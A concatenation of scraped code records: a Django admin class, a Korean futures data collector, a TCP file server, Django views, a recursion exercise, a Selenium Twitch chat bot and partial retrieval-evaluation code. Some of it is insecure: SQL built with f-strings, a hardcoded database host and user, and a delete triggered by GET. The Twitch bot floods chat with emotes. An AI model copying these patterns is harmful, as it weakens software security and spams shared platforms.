полей.\n radio_fields (dict): Поля для выбора с помощью радиокнопок.\n search_fields (tuple): Поля для текстового поиска.\n \"\"\"\n form = CityForm\n fieldsets = (\n (\n None,\n {\n 'fields': ('id', 'title', 'slug', 'timezone', 'state',),\n }\n ),\n (\n None,\n {\n 'fields': ('icon', 'img_preview',),\n 'classes': ('help_text',),\n 'description': _('city_icon_help_text'),\n }\n ),\n )\n list_display = ('ico_preview', 'title', 'slug', 'timezone_offset', 'state_icons',)\n list_display_links = ('title',)\n list_per_page = 10\n prepopulated_fields = {\n 'slug': ('title',),\n }\n radio_fields = {'state': admin.VERTICAL, }\n readonly_fields = ('img_preview',)\n search_fields = ('title',)\n\n def save_model(self, request, obj, form, change):\n \"\"\"Пересоздать кэш:\n * при сохранении созданной ранее записи,\n * если созданная ранее запись не пересохраняется в новую запись с новым первичным ключом.\n \"\"\"\n super(CityAdmin, self).save_model(request, obj, form, change)\n\n # Обновить кэш всех связанных с городом сайтов, если они присутствуют\n city_domains = Domain.objects.filter(city_id=obj.id).values_list('slug', flat=True)\n if city_domains:\n for domain_slug in city_domains:\n cache_factory('domain', domain_slug, reset=True)\n","sub_path":"bezantrakta/location/admin/city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653903505","text":"import sys\r\nimport time\r\nimport pytz\r\nimport datetime as dt\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport mysql.connector\r\nfrom sqlalchemy import create_engine\r\nimport pymysql\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QAxContainer import *\r\nfrom PyQt5.QtCore import *\r\nimport logging\r\n\r\npymysql.install_as_MySQLdb()\r\n\r\n# read nh pwd, drpbx token from text file\r\nwith open('./nh_info.txt', 'r') as f:\r\n lines = f.readlines()\r\nnhpwd = lines[0]\r\n\r\nwith open('./drpbx_info.txt', 'r') as f:\r\n lines = f.readlines()\r\ndrpbxtoken = lines[0]\r\n\r\n# read db pwd from text file\r\nwith open('./db_info.txt', 'r') as f:\r\n lines = f.readlines()\r\ndbpwd = lines[0]\r\n\r\n# logger = logging.getLogger('trace')\r\n# logger.setLevel(logging.INFO)\r\n# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n\r\n# # log 출력\r\n# stream_handler = logging.StreamHandler()\r\n# stream_handler.setFormatter(formatter)\r\n# logger.addHandler(stream_handler)\r\n#\r\n# # log를 파일에 출력\r\n# file_handler = logging.FileHandler('data_recv.log')\r\n# file_handler.setFormatter(formatter)\r\n# logger.addHandler(file_handler)\r\n\r\n# create connection instance\r\nwaidb = mysql.connector.connect(\r\n host='119.205.211.179',\r\n user='limpst',\r\n password=dbpwd,\r\n database='waikorea_port')\r\n# create cursor instance\r\ncursor = waidb.cursor()\r\n\r\nclass NH(QAxWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self._create_nh_instance()\r\n self._set_signals_connect()\r\n self._set_signals_login()\r\n self._set_signals_disconnect()\r\n self._set_signals_recvrealdata()\r\n\r\n def _create_nh_instance(self):\r\n self.setControl(\"WRAX.WRAXCtrl.1\")\r\n\r\n def _set_signals_connect(self):\r\n self.NetConnected.connect(self.server_connected)\r\n\r\n def _set_signals_disconnect(self):\r\n self.NetDisconnected.connect(self.disconnected)\r\n\r\n def _set_signals_login(self):\r\n self.ReplyLogin.connect(self.login_complete)\r\n\r\n def _set_signals_recvrealdata(self):\r\n self.RecvRealData.connect(self.recv_real_data)\r\n\r\n def connect_server(self):\r\n self.dynamicCall(\"OConnectHost(QString, QString)\", '210.183.186.51', '8300')\r\n self.connect_event_loop = QEventLoop()\r\n self.connect_event_loop.exec_()\r\n\r\n def server_connected(self):\r\n if self:\r\n print(\"connected\")\r\n else:\r\n print(\"not connected\")\r\n self.connect_event_loop.exit()\r\n\r\n def disconnected(self):\r\n print('Disconnected!!')\r\n self.connect_event_loop.exit()\r\n\r\n def login(self):\r\n self.dynamicCall(\"OLogin(QString, QString, QString)\", 'limpst', nhpwd, '')\r\n self.login_event_loop = QEventLoop()\r\n self.login_event_loop.exec_()\r\n\r\n def login_complete(self, code, msg):\r\n if code == 1:\r\n print('login completed')\r\n else:\r\n print('login failed : ' + msg)\r\n self.login_event_loop.exit()\r\n\r\n def reg_real_data(self, TrCode, KeyCode):\r\n\r\n reg_id = self.dynamicCall(\"ORegistRealData(QString, QString)\", TrCode, KeyCode)\r\n\r\n # self.realdata_event_loop = QEventLoop()\r\n # self.realdata_event_loop.exec_()\r\n\r\n return reg_id\r\n\r\n def unreg_real_data(self, reg_id):\r\n\r\n check = self.dynamicCall(\"OUnregistRealData(int)\", reg_id)\r\n\r\n return check\r\n\r\n def start_loop(self):\r\n\r\n self.realdata_event_loop = QEventLoop()\r\n self.realdata_event_loop.exec_()\r\n\r\n def recv_real_data(self, TrCode, KeyValue, RealID, DataSize, szData):\r\n\r\n if TrCode == 'SB_FUT_EXEC':\r\n\r\n exec_time, cur_p, ask_p, bid_p = get_price_info(szData)\r\n\r\n temp_df = pd.DataFrame({'exec_time': exec_time[:6],\r\n f'{dict_tickers[KeyValue.strip()]}_cur_p': cur_p,\r\n f'{dict_tickers[KeyValue.strip()]}_ask_p': ask_p,\r\n f'{dict_tickers[KeyValue.strip()]}_bid_p': bid_p}, index=[0])\r\n\r\n global df_out\r\n df_out = pd.concat([df_out, temp_df])\r\n\r\n elif TrCode == 'SB_FUT_HOGA':\r\n\r\n hoga_time, amts = get_amt_info(szData)\r\n\r\n temp_df2 = pd.DataFrame({'hoga_time': hoga_time[:6],\r\n f'{dict_tickers[KeyValue.strip()]}_ask5': amts[0],\r\n f'{dict_tickers[KeyValue.strip()]}_ask4': amts[1],\r\n f'{dict_tickers[KeyValue.strip()]}_ask3': amts[2],\r\n f'{dict_tickers[KeyValue.strip()]}_ask2': amts[3],\r\n f'{dict_tickers[KeyValue.strip()]}_ask1': amts[4],\r\n f'{dict_tickers[KeyValue.strip()]}_bid1': amts[5],\r\n f'{dict_tickers[KeyValue.strip()]}_bid2': amts[6],\r\n f'{dict_tickers[KeyValue.strip()]}_bid3': amts[7],\r\n f'{dict_tickers[KeyValue.strip()]}_bid4': amts[8],\r\n f'{dict_tickers[KeyValue.strip()]}_bid5': amts[9]}, index=[0])\r\n\r\n global df2_out\r\n df2_out = pd.concat([df2_out, temp_df2])\r\n\r\n self.realdata_event_loop.exit()\r\n\r\n\r\ndef get_price_info(szData):\r\n\r\n if szData.split()[0][4:] == '101R9000':\r\n cur_p = float(szData.split()[2])\r\n ask_p = float(szData.split()[11])\r\n bid_p = float(szData.split()[12])\r\n else:\r\n cur_p = float(szData.split()[2])\r\n ask_p = float(szData.split()[12])\r\n bid_p = float(szData.split()[13])\r\n\r\n exec_time = szData.split()[1]\r\n\r\n return exec_time, cur_p, ask_p, bid_p\r\n\r\n\r\ndef get_amt_info(szData):\r\n\r\n ask_1 = int(szData.split()[2].split('.')[1][2:8])\r\n bid_1 = int(szData.split()[2].split('.')[1][8:14])\r\n ask_2 = int(szData.split()[4].split('.')[1][2:8])\r\n bid_2 = int(szData.split()[4].split('.')[1][8:14])\r\n ask_3 = int(szData.split()[6].split('.')[1][2:8])\r\n bid_3 = int(szData.split()[6].split('.')[1][8:14])\r\n ask_4 = int(szData.split()[8].split('.')[1][2:8])\r\n bid_4 = int(szData.split()[8].split('.')[1][8:14])\r\n ask_5 = int(szData.split()[10].split('.')[1][2:8])\r\n bid_5 = int(szData.split()[10].split('.')[1][8:14])\r\n\r\n amts = [ask_5, ask_4, ask_3, ask_2, ask_1, bid_1, bid_2, bid_3, bid_4, bid_5]\r\n\r\n hoga_time = szData.split()[2].split('.')[1][14:]\r\n\r\n return hoga_time, amts\r\n\r\n\r\ndef insert_price_data_to_sql(df):\r\n\r\n df = df.replace(np.nan, 0.0)\r\n global today\r\n\r\n sql = f\"INSERT INTO input_data (Year_Mon_Day, Hour_Min_Sec, KOSPI200, KOSPI200_ask, KOSPI200_bid, \\\r\n USDKRW, USDKRW_ask, USDKRW_bid, NextUSD, NextUSD_ask, NextUSD_bid, KTB10, KTB10_ask, KTB10_bid, \\\r\n KTB3, KTB3_ask, KTB3_bid) \\\r\n VALUES ('{today[:4] + '/' + today[4:6] + '/' + today[6:]}', \\\r\n '{df['exec_time'].item()[:2] + ':' + df['exec_time'].item()[2:4] + ':' + df['exec_time'].item()[4:]}', \\\r\n {df['kospi_cur_p'].item()}, {df['kospi_ask_p'].item()}, {df['kospi_bid_p'].item()}, \\\r\n {df['usd_cur_p'].item()}, {df['usd_ask_p'].item()}, {df['usd_bid_p'].item()}, \\\r\n {df['nextusd_cur_p'].item()}, {df['nextusd_ask_p'].item()}, {df['nextusd_bid_p'].item()}, \\\r\n {df['ktb10_cur_p'].item()}, {df['ktb10_ask_p'].item()}, {df['ktb10_bid_p'].item()}, \\\r\n {df['ktb3_cur_p'].item()}, {df['ktb3_ask_p'].item()}, {df['ktb3_bid_p'].item()})\"\r\n\r\n cursor.execute(sql)\r\n waidb.commit()\r\n\r\n\r\ndef insert_amt_data_to_sql(df):\r\n\r\n df = df.replace(np.nan, 0.0)\r\n global today\r\n\r\n sql = f\"INSERT INTO input_data_amt (Year_Mon_Day, Hour_Min_Sec, \\\r\n KOSPI200_ask5, KOSPI200_ask4, KOSPI200_ask3, KOSPI200_ask2, KOSPI200_ask1, \\\r\n KOSPI200_bid1, KOSPI200_bid2, KOSPI200_bid3, KOSPI200_bid4, KOSPI200_bid5, \\\r\n USDKRW_ask5, USDKRW_ask4, USDKRW_ask3, USDKRW_ask2, USDKRW_ask1, \\\r\n USDKRW_bid1, USDKRW_bid2, USDKRW_bid3, USDKRW_bid4, USDKRW_bid5, \\\r\n NextUSD_ask5, NextUSD_ask4, NextUSD_ask3, NextUSD_ask2, NextUSD_ask1, \\\r\n NextUSD_bid1, NextUSD_bid2, NextUSD_bid3, NextUSD_bid4, NextUSD_bid5, \\\r\n KTB10_ask5, KTB10_ask4, KTB10_ask3, KTB10_ask2, KTB10_ask1, \\\r\n KTB10_bid1, KTB10_bid2, KTB10_bid3, KTB10_bid4, KTB10_bid5, \\\r\n KTB3_ask5, KTB3_ask4, KTB3_ask3, KTB3_ask2, KTB3_ask1, \\\r\n KTB3_bid1, KTB3_bid2, KTB3_bid3, KTB3_bid4, KTB3_bid5) \\\r\n VALUES ('{today[:4] + '/' + today[4:6] + '/' + today[6:]}', \\\r\n '{df['hoga_time'].item()[:2] + ':' + df['hoga_time'].item()[2:4] + ':' + df['hoga_time'].item()[4:]}', \\\r\n {df['kospi_ask5'].item()}, {df['kospi_ask4'].item()}, {df['kospi_ask3'].item()}, {df['kospi_ask2'].item()}, {df['kospi_ask1'].item()}, \\\r\n {df['kospi_bid1'].item()}, {df['kospi_bid2'].item()}, {df['kospi_bid3'].item()}, {df['kospi_bid4'].item()}, {df['kospi_bid5'].item()}, \\\r\n {df['usd_ask5'].item()}, {df['usd_ask4'].item()}, {df['usd_ask3'].item()}, {df['usd_ask2'].item()}, {df['usd_ask1'].item()}, \\\r\n {df['usd_bid1'].item()}, {df['usd_bid2'].item()}, {df['usd_bid3'].item()}, {df['usd_bid4'].item()}, {df['usd_bid5'].item()}, \\\r\n {df['nextusd_ask5'].item()}, {df['nextusd_ask4'].item()}, {df['nextusd_ask3'].item()}, {df['nextusd_ask2'].item()}, {df['nextusd_ask1'].item()}, \\\r\n {df['nextusd_bid1'].item()}, {df['nextusd_bid2'].item()}, {df['nextusd_bid3'].item()}, {df['nextusd_bid4'].item()}, {df['nextusd_bid5'].item()}, \\\r\n {df['ktb10_ask5'].item()}, {df['ktb10_ask4'].item()}, {df['ktb10_ask3'].item()}, {df['ktb10_ask2'].item()}, {df['ktb10_ask1'].item()}, \\\r\n {df['ktb10_bid1'].item()}, {df['ktb10_bid2'].item()}, {df['ktb10_bid3'].item()}, {df['ktb10_bid4'].item()}, {df['ktb10_bid5'].item()}, \\\r\n {df['ktb3_ask5'].item()}, {df['ktb3_ask4'].item()}, {df['ktb3_ask3'].item()}, {df['ktb3_ask2'].item()}, {df['ktb3_ask1'].item()}, \\\r\n {df['ktb3_bid1'].item()}, {df['ktb3_bid2'].item()}, {df['ktb3_bid3'].item()}, {df['ktb3_bid4'].item()}, {df['ktb3_bid5'].item()})\"\r\n\r\n cursor.execute(sql)\r\n waidb.commit()\r\n\r\n\r\ndef initialize_df():\r\n\r\n global df_out, df2_out\r\n df_out = pd.DataFrame(columns=['today', 'exec_time', 'kospi_cur_p', 'kospi_ask_p', 'kospi_bid_p',\r\n 'usd_cur_p', 'usd_ask_p', 'usd_bid_p',\r\n 'nextusd_cur_p', 'nextusd_ask_p', 'nextusd_bid_p',\r\n 'ktb10_cur_p', 'ktb10_ask_p', 'ktb10_bid_p',\r\n 'ktb3_cur_p', 'ktb3_ask_p', 'ktb3_bid_p'], index=[1])\r\n df2_out = pd.DataFrame(columns=['today', 'hoga_time',\r\n 'kospi_ask5', 'kospi_ask4', 'kospi_ask3', 'kospi_ask2', 'kospi_ask1',\r\n 'kospi_bid1', 'kospi_bid2', 'kospi_bid3', 'kospi_bid4', 'kospi_bid5',\r\n 'usd_ask5', 'usd_ask4', 'usd_ask3', 'usd_ask2', 'usd_ask1',\r\n 'usd_bid1', 'usd_bid2', 'usd_bid3', 'usd_bid4', 'usd_bid5',\r\n 'nextusd_ask5', 'nextusd_ask4', 'nextusd_ask3', 'nextusd_ask2', 'nextusd_ask1',\r\n 'nextusd_bid1', 'nextusd_bid2', 'nextusd_bid3', 'nextusd_bid4', 'nextusd_bid5',\r\n 'ktb10_ask5', 'ktb10_ask4', 'ktb10_ask3', 'ktb10_ask2', 'ktb10_ask1',\r\n 'ktb10_bid1', 'ktb10_bid2', 'ktb10_bid3', 'ktb10_bid4', 'ktb10_bid5',\r\n 'ktb3_ask5', 'ktb3_ask4', 'ktb3_ask3', 'ktb3_ask2', 'ktb3_ask1',\r\n 'ktb3_bid1', 'ktb3_bid2', 'ktb3_bid3', 'ktb3_bid4', 'ktb3_bid5'], index=[1])\r\n\r\n\r\ndef check_insert_data(datr, latest_data):\r\n\r\n # manipulate df in order to compare and save the latest price data to DB server\r\n if datr.shape[0] == 2 and datr.index[0] == 1:\r\n # delete first row which only has NaN values\r\n datr.drop(1, inplace=True)\r\n latest_data = datr.tail(1)\r\n # insert first data to sql server\r\n if len(datr.columns) <= 20:\r\n insert_price_data_to_sql(latest_data)\r\n else:\r\n insert_amt_data_to_sql(latest_data)\r\n\r\n if datr.shape[0] == 3 and datr.index[0] == 1:\r\n datr.drop(1, inplace=True)\r\n temp_data = datr.head(1)\r\n latest_data = datr.tail(1)\r\n # insert last data to sql server\r\n if len(datr.columns) <= 20:\r\n insert_price_data_to_sql(temp_data)\r\n insert_price_data_to_sql(latest_data)\r\n else:\r\n insert_amt_data_to_sql(temp_data)\r\n insert_amt_data_to_sql(latest_data)\r\n\r\n if datr.shape[0] >= 2:\r\n if len(datr.columns) <= 20:\r\n if latest_data['exec_time'].item() != datr.tail(1)['exec_time'].item():\r\n # change the last_data\r\n latest_data = df_out.tail(1)\r\n # insert the last data to sql server\r\n insert_price_data_to_sql(latest_data)\r\n else:\r\n if latest_data['hoga_time'].item() != datr.tail(1)['hoga_time'].item():\r\n # change the last_data\r\n latest_data = datr.tail(1)\r\n # insert the last data to sql server\r\n insert_amt_data_to_sql(latest_data)\r\n\r\n return datr, latest_data\r\n\r\n# TR Code : 공통 호가 조회 (FZQ12011)\r\n# 종목 Code : 코스피200 지수 최종거래일 in 9월 (101R9000)\r\n# 종목 Code : USD/KRW 통화 최종거래일 in 7월 (175R7000) / 175년월000 (년 - R:2021, S:2022 / 월 2~9는 숫자 10,11,12는 A,B,C)\r\n# 종목 Code : 국고채 10년물 최종거래일 in 9월 (167R9000)\r\n# 종목 Code : 국고채 3년물 최종거래일 in 9월 (165R9000)\r\nkospi = '101R9000'\r\nusd = '175R7000'\r\nnextusd = '175R8000'\r\nktb10 = '167R9000'\r\nktb3 = '165R9000'\r\ntickers = [kospi, usd, nextusd, ktb10, ktb3]\r\ndict_tickers = {'101R9000': 'kospi', '175R7000': 'usd', '175R8000': 'nextusd', '167R9000': 'ktb10', '165R9000': 'ktb3'}\r\nglobal today\r\ntoday = dt.datetime.now(pytz.timezone('Asia/Seoul')).strftime('%Y%m%d')\r\n\r\n# path for saving file in Dropbox\r\ndpb_path = 'C:\\\\Users\\\\waikorea\\\\Dropbox\\\\datafeed\\\\'\r\n# path for saving file in local computer\r\nlocal_path = 'C:\\\\Users\\\\waikorea\\\\Desktop\\\\NH\\\\CSV\\\\'\r\n\r\n# create engine to connect to DB server\r\nengine = create_engine(\"mysql+mysqldb://limpst:\" + dbpwd + \"@119.205.211.179/waikorea_port\", encoding='utf-8')\r\n\r\n# initialize DataFrame to save the data\r\nglobal last_data, last_data2\r\nlast_data = pd.DataFrame()\r\nlast_data2 = pd.DataFrame()\r\n\r\n# start the data per seconds collection program\r\nif __name__ == \"__main__\":\r\n\r\n # create QApp object\r\n app = QApplication(sys.argv)\r\n\r\n # create QAxWidget object\r\n nh = NH()\r\n\r\n # connect to the server\r\n nh.connect_server()\r\n\r\n # log-in\r\n nh.login()\r\n\r\n start_t = '090000' # start receiving data at 9:00\r\n end_t = '153459' # end receiving data at 15:35\r\n\r\n reg_ids = []\r\n for ticker in tickers:\r\n reg_id = nh.reg_real_data('SB_FUT_EXEC', ticker)\r\n reg_id2 = nh.reg_real_data('SB_FUT_HOGA', ticker)\r\n reg_ids.append(reg_id)\r\n reg_ids.append(reg_id2)\r\n\r\n if len(reg_ids) == len(tickers)*2:\r\n print('registered for real-time data')\r\n else:\r\n print('some tickers have not been registered')\r\n\r\n # initialize dfs to store data\r\n initialize_df()\r\n\r\n # while loop for starting the data receiving event at 9:00\r\n while True:\r\n now = dt.datetime.now(pytz.timezone('Asia/Seoul')).strftime('%H%M%S')\r\n\r\n # start the process at 9:00\r\n if now >= start_t:\r\n\r\n # start the receiving event loop\r\n nh.start_loop()\r\n\r\n # initialize dfs every 5 seconds in order to reduce the process time\r\n if (int(now[4:]) % 5) == 0:\r\n initialize_df()\r\n\r\n # concat all the price data and delete duplicate lines\r\n df_out.drop_duplicates(subset=['exec_time'], inplace=True)\r\n # check and insert price data to DB server\r\n df_out, last_data = check_insert_data(df_out, last_data)\r\n\r\n # concat all the price data and delete duplicate lines\r\n df2_out.drop_duplicates(subset=['hoga_time'], inplace=True)\r\n # check and insert amt data to DB server\r\n df2_out, last_data2 = check_insert_data(df2_out, last_data2)\r\n\r\n # break the while loop at 15:35\r\n if now >= end_t:\r\n print('Market closed')\r\n break\r\n\r\n checks = 0\r\n for reg_id in reg_ids:\r\n check = nh.unreg_real_data(reg_id)\r\n if check:\r\n checks += 1\r\n\r\n if checks == len(reg_ids):\r\n print('unregistered complete')\r\n else:\r\n print('some ids are not unregistered yet')\r\n\r\n # read data from sql server and save it as csv file in both Dropbox and local computer\r\n price_data = pd.read_sql(\"input_data\", con=engine, index_col='SEQ')\r\n price_data.to_csv(dpb_path + 'kor_fut_prices_' + today + '.csv', header=True, index=False)\r\n price_data.to_csv(local_path + 'kor_fut_prices_' + today + '.csv', header=True, index=False)\r\n amt_data = pd.read_sql(\"input_data_amt\", con=engine, index_col='SEQ')\r\n amt_data.to_csv(dpb_path + 'kor_fut_amts_' + today + '.csv', header=True, index=False)\r\n amt_data.to_csv(local_path + 'kor_fut_amts_' + today + '.csv', header=True, index=False)\r\n\r\n time.sleep(5)\r\n\r\n # connect to DB and delete the sql table data when the market closes\r\n try:\r\n # create connection instance\r\n waidb = mysql.connector.connect(\r\n host='119.205.211.179',\r\n user='limpst',\r\n password=dbpwd,\r\n database='waikorea_port')\r\n # create cursor instance\r\n cursor = waidb.cursor()\r\n # write sql query\r\n sql_trunc_query = \"\"\"TRUNCATE TABLE input_data\"\"\"\r\n sql_trunc_query2 = \"\"\"TRUNCATE TABLE input_data_amt\"\"\"\r\n sql_query = [sql_trunc_query, sql_trunc_query2]\r\n # execute sql query\r\n for query in sql_query:\r\n cursor.execute(query)\r\n waidb.commit()\r\n print('SQL table cleared')\r\n\r\n # raise error if there is any\r\n except mysql.connector.Error as e:\r\n print(e)\r\n\r\n # close the DB connection\r\n finally:\r\n if waidb.is_connected():\r\n cursor.close()\r\n waidb.close()\r\n print('connection closed')\r\n\r\n print('data collection task finished')\r\n","sub_path":"kor_fut_data2db.py","file_name":"kor_fut_data2db.py","file_ext":"py","file_size_in_byte":18822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167977708","text":"#Author:ike yang\r\nimport socket\r\nimport os\r\nimport json\r\nfrom my_socket import tran_recv\r\nserver_file_path=os.path.join(os.getcwd(),'server_file')\r\n# print(server_file_path)\r\nfile_list=os.listdir(server_file_path)\r\n\r\nsk=socket.socket()\r\n\r\nsk.bind(('127.0.0.1',8086))\r\nsk.listen()\r\nconn,addr=sk.accept()\r\nmy_sk=tran_recv(conn)\r\n\r\nmy_sk.json_data_trans(file_list)\r\nclient_choose=my_sk.data_recv()\r\nmy_sk.file_trans(server_file_path,client_choose)\r\n\r\n\r\n\r\n\r\nconn.close()\r\nsk.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"TCP_trans_data/tcp_FIleServer.py","file_name":"tcp_FIleServer.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"398264108","text":"from django.shortcuts import render, redirect\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom django.views.generic import ListView, FormView, DeleteView\nfrom django.urls import reverse_lazy\n\nfrom wordbook.forms import WordAddForm\nfrom wordbook.models.wordbook import Wordbook\n\nfrom django.core.paginator import Paginator\n\nfrom django.contrib import messages\n\nfrom bootstrap_modal_forms.mixins import PassRequestMixin\n\n\n@method_decorator([login_required], name='dispatch')\nclass HomeView(ListView):\n model = Wordbook\n paginate_by = 12\n template_name = 'wordbook/home.html'\n\n def get(self, request, *args, **kwargs):\n queryset_list = Wordbook.exec_query(request.user.pk)\n paginator = Paginator(queryset_list, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n queryset = paginator.get_page(page)\n context = {\n 'queryset': queryset,\n }\n return render(request, 'wordbook/home.html', context)\n\n\n@method_decorator([login_required], name='dispatch')\nclass WordAddView(FormView):\n form_class = WordAddForm\n template_name = 'wordbook/word_add.html'\n success_url = reverse_lazy('wordbook:home')\n\n def get_form_kwargs(self):\n kwargs = super(WordAddView, self).get_form_kwargs()\n kwargs['user'] = self.request.user\n return kwargs\n\n def post(self, request, *args, **kwargs):\n form = WordAddForm(request.POST, user=request.user)\n if not form.is_valid():\n return render(request, 'wordbook/word_add.html', {'form': form})\n form.save(commit=True)\n messages.success(request, \"'%s' has been just added\" % form.cleaned_data['adding_word'])\n return redirect('wordbook:home')\n\n\n@method_decorator([login_required], name='dispatch')\nclass WordDeleteView(DeleteView):\n model = Wordbook\n success_url = reverse_lazy('wordbook:home')\n\n def get(self, request, *args, **kwargs):\n return self.post(request, *args, **kwargs)","sub_path":"wordbook/views/wordbook.py","file_name":"wordbook.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210863701","text":"# StringifyNumbers --> Write a function that takes in an object and finds all the values which are numbers and converts \n# them to strings. \n\ndef stringifyNumbers(obj):\n for key,value in obj.items():\n if type(value) is int:\n obj[key] = str(value)\n elif type(value) is dict:\n stringifyNumbers(value)\n else:\n pass\n return obj\n\n\nobj1 = {\n \"num\": 1,\n \"test\": [],\n \"data\": {\n \"val\": 4,\n \"info\": {\n \"isRight\": True,\n \"random\": 66\n }\n }\n}\n\nprint(stringifyNumbers(obj1))\n\nobj1 = {\n \"num\": '1',\n \"test\": [],\n \"data\": {\n \"val\": '4',\n \"info\": {\n \"isRight\": True,\n \"random\": '66'\n }\n }\n}","sub_path":"src/interview_questions/recursionAndDynamicProgramming/easy/stringifyNumbers.py","file_name":"stringifyNumbers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295325093","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport sys, os\nimport time, math\n\nclass Message():\n def __init__(self, user, message):\n self.user = user\n self.message = message\n def __eq__(self, other):\n return self.message == other.message\n\n\nif os.name == \"nt\":\n driverPath = \"Miscellaneous/driver/chromedriver_2.24.exe\"\nelse :\n driverPath = \"Miscellaneous/driver/chromedriver\"\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=C:\\\\Users\\\\Akshay L Aradhya\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Twitch Test\")\ndriver = webdriver.Chrome(chrome_options=options, executable_path=driverPath)\ndriver.get('https://www.twitch.tv/tyrant_theviper')\n\nchatID = \"ember2478\"\nip = input(\"Chat ID : \");\nif ip != \"\":\n chatID = \"ember\"+ip\n\nwhile True:\n\n textbox = driver.find_element_by_id(chatID)\n\n size = input(\"Enter Size : \")\n size = int(size)\n delay = input(\"Enter Delay : \")\n delay = float(delay)\n\n stringList = [\"deIlluminati\", \"Kappa\", \"PJSalt\", \"BloodTrail\", \"PogChamp\"]\n\n for i in range(1, size):\n string = ' '.join(stringList[:i][::-1])\n textbox.send_keys(string)\n textbox.send_keys(Keys.ENTER)\n time.sleep(delay)\n\n for i in range(size, 0, -1):\n string = ' '.join(stringList[:i][::-1])\n textbox.send_keys(string)\n textbox.send_keys(Keys.ENTER)\n time.sleep(delay)\n\n\n\n\n","sub_path":"Miscellaneous/Twitch_Chat_Bot.py","file_name":"Twitch_Chat_Bot.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624712920","text":"from utils import *\nimport pickle\nimport gensim\nimport re\nfrom pyhanlp import *\nimport pynlpir\nimport os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport operator as op\nfrom gensim.summarization.bm25 import BM25\n\ndef check_q_and_context(train_ids, train_dict, context_dict):\n while True:\n print('='*30)\n qid = input('输入问题的id (1~5000) 【退出按 Q】')\n if qid == 'Q':\n break\n qid = train_ids[int(qid)-1]\n question = train_dict.get(qid).get('question')\n docid = train_dict.get(qid).get('docid')\n context = context_dict.get(docid)\n print('Q: {}'.format(question))\n print('context: {}'.format(context))\n print('=' * 30)\n\n\n\ndef cal_sim_QandC_by_dfs(question_f, context_vocab, restore=True):\n save_path = path.get('result')\n if os.path.exists(save_path) and restore:\n print('./result_dfs.pkl is existed')\n result = load_pkl_data(save_path)\n else:\n result = {}\n with tqdm(total=len(question_f)) as pbar:\n for q_item in question_f:\n question = q_item.get('question')\n isBad = q_item.get('isBad')\n true_docid = q_item.get('docid')\n qid = q_item.get('id')\n\n if isBad:\n continue\n else:\n doc_scores = []\n for docid, doc_dfs in context_vocab.items():\n score = 0\n for q_word in question:\n score += doc_dfs.get(q_word, 0)\n doc_scores.append([docid, score])\n doc_scores.sort(key=op.itemgetter(1), reverse=True)\n result[qid] = {\n 'true_docid': true_docid,\n 'id': qid,\n 'doc_scores': doc_scores,\n }\n pbar.update(1)\n save_pkl_data(result, save_path)\n return result\n\n\ndef cal_top_acc(result, context_dict, K):\n correct = [0 for _ in range(K)]\n bad_samples = []\n with tqdm(total=len(result)) as pbar:\n for k in range(K):\n pbar.reset()\n pbar.set_description('compute top-{} acc'.format(k+1))\n for _id, item in enumerate(result):\n true_docid = item['docid']\n # answer_start, answer_end = item['answer_span']\n docids = item['text_ids']\n top_K_docids = [text_id for text_id in docids[:k+1]]\n for docid in top_K_docids:\n\n if true_docid == docid:\n correct[k] += 1\n break\n # doc_start = doc[\"start\"]\n # text_length = len(doc[\"text\"])\n # doc_end = doc_start + text_length - 1\n # if answer_start >= doc_start and answer_start <= doc_end:\n # if answer_end <= doc_end:\n # correct[k] += 1\n # break\n\n pbar.update(1)\n for k in range(K):\n print('top-{} acc is {:.2%}'.format(k+1, correct[k]*1.0/len(result)))\n\n\ndef cal_MAP(result):\n with tqdm(total=len(result)) as pbar:\n AP = []\n for _id, item in result.items():\n true_docid = item['true_docid']\n doc_scores = item['doc_scores']\n doc_scores = [doc_id for doc_id, _ in doc_scores]\n true_docid_rank = doc_scores.index(true_docid) + 1\n P = 1 / true_docid_rank\n AP.append(P)\n pbar.update(1)\n MAP = np.array(AP).mean()\n print('MAP is {:.2%}'.format(MAP))\n\n\ndef build_list_and_idmap(train_dict, context_dict, path=None):\n question_list = []\n question_idmap = {}\n\n context_list = []\n context_idmap = {}\n\n with tqdm(total=len(train_dict)) as pbar:\n pbar.set_description('build list_and_idmap of train_dict')\n for index, item in enumerate(train_dict.items()):\n _id, _item = item\n question = _item['question']\n word_li = HanLP.segment(question)\n for word in word_li:\n question_list.append(word.word)\n\n # question_list.append(pynlpir.segment(question, pos_tagging=False))\n question_idmap[_id] = str(index)\n question_idmap[str(index)] = _id\n pbar.update(1)\n\n if path and os.path.exists(path.get('context_idmap')) and os.path.exists(path.get('context_list')):\n context_list = load_pkl_data(path.get('context_list'))\n context_idmap = load_pkl_data(path.get('context_idmap'))\n else:\n with tqdm(total=len(context_dict)) as pbar:\n pbar.set_description('build list_and_idmap of context_dict')\n for index, item in enumerate(context_dict.items()):\n _id, doc = item\n # word_li = HanLP.segment(doc[\"text\"])\n # for word in word_li:\n # 